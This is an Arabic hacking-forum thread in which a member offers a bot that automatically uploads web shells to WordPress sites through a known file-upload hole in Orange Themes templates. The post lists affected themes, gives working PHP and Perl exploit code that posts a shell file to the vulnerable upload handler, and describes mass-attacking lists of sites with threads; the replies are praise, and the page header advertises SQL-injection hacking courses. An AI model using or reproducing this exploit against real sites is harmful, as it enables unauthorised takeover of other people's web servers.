1. المٌقدمة الأولي :دورة إختبار ثغرات حقن قواعد البيانات SQLI الإحترافية لعام 2017 عام 2018
    تٌعد ثغرات حقن قواعد البينات الثغرة رقم واحد فى العالم والمصنفة تحت بند الإخطر
    والفريق التابع له بإختراق أكبر المواقع الصهيونية قرائة الموضوع
  2. المٌقدمة الثانية : دورة إختبار ثغرات حقن قواعد البيانات SQLI الإحترافية لعام 2017 عام 2018
    في هذه المٌثقدمة الثانية والأخيرة سوف نتعرف على قواعد علم حقن قواعد البيانات
    حتى يتثنى لنا علم يٌساعدنا على القيام بعمليات الحقن بالطرق الصحيحه قرائة الموضوع
  3. دورة كشف دمج والتلغيم حصريا على أرض عراق تيم(2017)
    بعد ماقمت بعمل دورة الكشف دمج والتلغيم وستكملت الدوره وتحتوي على 12 درس
    كانت دروس حصريا على عراق تيم وشرح واضح جدا ومفهوم الى المبتدأ والى المبدع قرائة الموضوع

[ أداة ] Wordpress Orange Theme Upload Shell Bot

الموضوع في 'قسم الأدوات' بواسطة MR.HASTER, بتاريخ ‏26 يونيو 2014.

كاتب الموضوع : MR.HASTER المشاهدات : 763 الردود : 4 ‏26 يونيو 2014
حالة الموضوع:
مغلق
  1. غير متصل

    MR.HASTER
    rankrank
    Developer

    عضو منذ:
    ‏16 نوفمبر 2012
    عدد المشاركات:
    الإعجابات المتلقاة:
    2
    نقاط الجائزة:

    [​IMG]
    Wordpress Orange Theme Upload Shell Bot

    فكرة الأداة :

    كما هو موضح في إسم الأداة هي عبارة علي إستغلال أوتوماتيكي لرفع شيل
    في مواقع الورد بريس من خلال ثغرة أبلود معروفة و متواجدة في عديد التيمات السكريب
    و تقريبا في أكثر من 60 تيم مصاب بهي الثغرة بعض التيمات المصابة

    [​IMG]

    كود PHP:
    agritourismo-theme
    bordeaux
    -theme    
    bulteno
    -theme
    oxygen
    -theme
    radial
    -theme
    rayoflight
    -theme
    reganto
    -theme
    rockstar
    -theme


    [​IMG]

    إستغلال للثغرة php & perl

    <?

    كود PHP:
    php
    $uploadfile
    ="EgyShell-Upload.php";
    $ch curl_init("http://[LocalHost]/wp-content/themes/[Theme Name]/functions/upload-handler.php");
    curl_setopt($chCURLOPT_POSTtrue);
    curl_setopt($chCURLOPT_POSTFIELDS,
            array(
    'orange_themes'=>"@$uploadfile"));
    curl_setopt($chCURLOPT_RETURNTRANSFER1);
    $postResult curl_exec($ch);
    curl_close($ch);
    print 
    "$postResult";
    ?>

    #!/usr/bin/perl
    use WWW::Mechanize;
    my $website = $ARGV[ 0 ];
    my $mech = new WWW::Mechanize(autocheck => 0);
            my $file = [
            'm-a.php',# The file you'd like to upload.
            'm-a.php',# The filename you'd like to give the web server.
            'Content-type' => 'text/plain'];
            $mech->post($website,
            'Content_Type' => 'form-data',
            'Content' => [ 'orange_themes' => $file ]
            );
    الأداة تعمل من خلال ليستت مواقع الورد بريس . تستختج التيمات الموجودة فيها
    بعدها تعمل إستغلال أوتوماتيكي و تجرب و تتحقق من إزا كان الشيل رفع أم لا و الشغل كلو بالثريد للسرعة في العمل صورة للأداة !!

    [​IMG]

    ملاحظة :
    فيك تغتر thread number من السورس الملفات الازمة مرفقة مع الأداة أي تغيير أو إضافة ممكن تعطل العمل

    كود PHP:
    wp-content/uploads/2014/01/
    لازم تغير العدد الشهري و السنة من السورس للتحقق
    الأداة في المرفقات

    الأداة مبرمجة منذ سنة تقريبا لهذا أي خطأ أو أي إستفسار بالخدمة
    في إصدار ثاني للأداة قريبا إ ن شاء الله

    تحياتي ~
    [​IMG]
     

    الملفات المرفقة:

    • bot.zip
      حجم الملف:
      2.5 ك. ب
      المشاهدات:
      29


    جاري تحميل الصفحة...
  2. غير متصل

    علي القناص <span style="font-weight: bold; text-shadow: #BBBB
    V • I • P

    عضو منذ:
    ‏6 مارس 2014
    عدد المشاركات:
    الإعجابات المتلقاة:
    7
    نقاط الجائزة:

    رد: Wordpress Orange Theme Upload Shell Bot

    عاشت الايادي استمر
     


  3. غير متصل

    Ameer Eagle V.I.P
    V • I • P

    عضو منذ:
    ‏7 يونيو 2014
    عدد المشاركات:
    الإعجابات المتلقاة:
    2,777
    نقاط الجائزة:
    الجنس:
    ذكر
    الوظيفة:
    Student
    الإقامة:

    رد: Wordpress Orange Theme Upload Shell Bot

    حلو حبي عاشت الايادي
     


  4. غير متصل

    أمير عرش الدموع
    DeveloPer Plus

    عضو منذ:
    ‏25 يناير 2012
    عدد المشاركات:
    الإعجابات المتلقاة:
    3
    نقاط الجائزة:
    الإقامة:

    رد: Wordpress Orange Theme Upload Shell Bot

    بارك الله فيك يا بطل

    واصل الإبداع

    بالتوفيق
     


  5. غير متصل

    القرصان الصغير
    rankrank
    Developer

    عضو منذ:
    ‏31 أكتوبر 2012
    عدد المشاركات:
    الإعجابات المتلقاة:
    2
    نقاط الجائزة:
    الإقامة:

    رد: Wordpress Orange Theme Upload Shell Bot

    يعطيك آلعافيهُ مآقصرتُ .
     


حالة الموضوع:
مغلق

مشاركة هذه الصفحة

جاري تحميل الصفحة...